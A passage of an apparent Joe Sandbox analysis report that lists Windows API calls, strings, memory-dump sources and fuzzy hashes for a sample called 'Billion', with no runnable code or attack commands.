                                                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0013100A), ref: 001510E6
                                                                                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0013100A), ref: 001510F5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001510F0
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0014F151
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                          • String ID: `5 $h5
                                                                                                                                                                                                                                                                                                          • API String ID: 1385522511-1936157198
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001A39F0
                                                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 001A3A05
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                          • String ID: aut
                                                                                                                                                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001C2DC8
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001C2DDB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001C2E08
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 001C2E0F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                          • Opcode ID: ce06821e2b324a366ad0c66e1e10d1cb4c50b9870f99465076b8f8d3bedcf386
                                                                                                                                                                                                                                                                                                          • Instruction ID: 66fc86ea830a370ac5be2183fa78a7634b9027ffaaca4cd1a96da222bfd80fd0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce06821e2b324a366ad0c66e1e10d1cb4c50b9870f99465076b8f8d3bedcf386
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D0A9313813107AE668B330AC0FFD27A209B10B00F104838B305EA4C0CAA0A880C644
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0016C213
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0016C221
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0016C27C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0851e07f1e95cf7bf0ecdfad317c80a8b1a42b05e64ac41f9e1698f2a4a3ed7b
                                                                                                                                                                                                                                                                                                          • Instruction ID: c8d55d566221f090db204405e6af90702a9666dc63e64d1a9d90916c5512f24b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0851e07f1e95cf7bf0ecdfad317c80a8b1a42b05e64ac41f9e1698f2a4a3ed7b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C411531600206EFDB258FE5CC54ABA7BA5EF15710F25416DFC99AB2A1DB309D21CBE0